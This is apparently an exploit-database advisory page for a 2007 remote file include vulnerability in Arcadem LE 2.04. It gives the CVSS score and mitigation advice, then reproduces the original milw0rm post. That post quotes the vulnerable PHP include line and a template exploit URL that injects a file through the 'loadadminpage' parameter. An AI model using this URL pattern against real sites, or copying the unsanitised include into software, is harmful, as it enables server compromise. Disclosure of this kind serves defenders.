header-logo
Suggest Exploit
vendor:
Arcadem LE
by:
KnocKout
5.5
CVSS
MEDIUM
Remote File Include
CWE
Product Name: Arcadem LE
Affected Version From: 02.04
Affected Version To: 02.04
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Arcadem LE <= 2.04 Remote File Include Vulnerability

The vulnerability exists in the frontpage_right.php file of Arcadem LE version 2.04. An attacker can exploit this vulnerability by injecting a file through the 'loadadminpage' parameter in the URL.

Mitigation:

The vendor should release a patch or an updated version of the script to fix the vulnerability. In the meantime, users can mitigate the risk by restricting access to the affected file or by implementing proper input validation and sanitization.
Source

Exploit-DB raw data:

Arcadem LE <= 2.04 Remote File Include Vulnerability

 

Author : KnocKout
Greetz to : CoRSaNTuRK , BORDO , CWneSTer , By-Ajan , User , 44ahmetov , CoBRa_21 , Khirash , CWSearcher , idam
Cyber-Warrior / CW Exploiter TIM

--------------------------------------

Script : Arcadem LE
Version : 2.04
Download : http://www.agaresmedia.com/downloads/Arcadem_LE_2.04.zip

=======================================================

Vulnerability in frontpage_right.php ;


  <?PHP include($loadadminpage); ?>


Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File]

=========================================================

# milw0rm.com [2007-12-21]

Navigation

Suggest Exploit

Services By CQR